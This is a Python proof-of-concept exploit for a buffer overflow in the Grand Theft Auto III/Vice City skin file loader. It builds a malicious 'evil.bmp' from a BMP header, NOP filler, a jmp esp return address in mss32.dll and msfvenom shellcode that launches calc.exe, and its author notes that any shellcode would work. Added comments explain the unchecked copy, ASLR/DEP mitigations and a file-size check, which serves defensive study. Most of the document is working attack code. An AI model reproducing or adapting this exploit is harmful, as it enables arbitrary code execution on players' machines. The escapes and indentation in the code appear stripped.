# Exploit Title: Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow
# Exploit Date: 22.01.2023
# Discovered and Written by: Knursoft
# Vendor Homepage: https://www.rockstargames.com/
# Version: v1.1
# Tested on: Windows XP SP2/SP3, 7, 10 21H2
# CVE : N/A

#1 - Run this python script to generate "evil.bmp" file.
#2 - Copy it to [Your Game Path]skins.
#3 - Launch the game and navigate to Options > Player Setup and choose skin "evil".
#4 - Buffer Overflow occurs and calc.exe pops up!

# Payload blob: x86 shellcode the author generated with msfvenom (windows/exec).
# The last bytes of the blob spell "calc.exe" followed by a NUL, i.e. the command
# string handed to the exec stub; nothing in the blob is game-specific.
#msfvenom -p windows/exec CMD="calc.exe"
buf = b""
buf += b"xfcxe8x82x00x00x00x60x89xe5x31xc0x64"
buf += b"x8bx50x30x8bx52x0cx8bx52x14x8bx72x28"
buf += b"x0fxb7x4ax26x31xffxacx3cx61x7cx02x2c"
buf += b"x20xc1xcfx0dx01xc7xe2xf2x52x57x8bx52"
buf += b"x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"
buf += b"x51x8bx59x20x01xd3x8bx49x18xe3x3ax49"
buf += b"x8bx34x8bx01xd6x31xffxacxc1xcfx0dx01"
buf += b"xc7x38xe0x75xf6x03x7dxf8x3bx7dx24x75"
buf += b"xe4x58x8bx58x24x01xd3x66x8bx0cx4bx8b"
buf += b"x58x1cx01xd3x8bx04x8bx01xd0x89x44x24"
buf += b"x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5a"
buf += b"x8bx12xebx8dx5dx6ax01x8dx85xb2x00x00"
buf += b"x00x50x68x31x8bx6fx87xffxd5xbbxf0xb5"
buf += b"xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7c"
buf += b"x0ax80xfbxe0x75x05xbbx47x13x72x6fx6a"
buf += b"x00x53xffxd5x63x61x6cx63x2ex65x78x65"
buf += b"x00"
#any shellcode should work, as it seems there is no badchars
# NOTE(review): the "no bad chars" statement is the author's claim; nothing on
# this page demonstrates what byte values the skin loader does or does not filter.

# Build-variant switch: the Steam build of GTA III gets 112 extra filler bytes in
# front of the return address (see the `if ver == 1` branch below), which
# presumably reflects a different stack frame layout in that build -- unverified.
ver = 0 #set to 1 if you want it to work on GTA III steam version

# Overwritten return address. The author states it is the address of a `jmp esp`
# inside mss32.dll. Reusing one fixed address across runs implies that DLL loads
# at a constant base (no ASLR) -- TODO confirm. From the defender's side the
# relevant mitigations are a relocatable (ASLR-enabled) mss32.dll and DEP for the
# game process, since control is transferred to the stack-resident bytes below.
esp = b"xb9xc5x14x21" #mss32.dll jmp esp
# 16-byte BMP prefix: 'BM' magic, a declared file size of 0x00030036 (196662
# bytes), four reserved bytes, pixel-data offset 0x36, then the first two bytes of
# the DIB header size field (0x28). The declared size is far larger than what this
# script actually writes (about 1.2-1.4 KB), so a loader or scanner that compares
# the size field with the real file length has a cheap way to reject such a file
# before any copy happens.
bmphdr =
b"x42x4Dx36x00x03x00x00x00x00x00x36x00x00x00x28x00"
#generic bmp header

# File layout: BMP prefix, filler up to the saved return address, the jmp-esp
# address, a short pad, then the shellcode. The 1026-byte filler suggests the skin
# loader copies the file into a fixed-size stack buffer of roughly that size with
# no length check -- that unchecked copy is the defect a fix has to address
# (bound the copy by the destination size, not by the file size).
payload = bmphdr
payload += b"x90" * 1026
if ver == 1:
payload += b"x90" * 112
payload += esp
payload += b"x90" * 20 #padding
payload += buf

# The crafted file is written to the current working directory; the game only
# reads it once it has been copied into the skins folder by hand (step 2 above).
with open("evil.bmp", "wb") as poc:
poc.write(payload)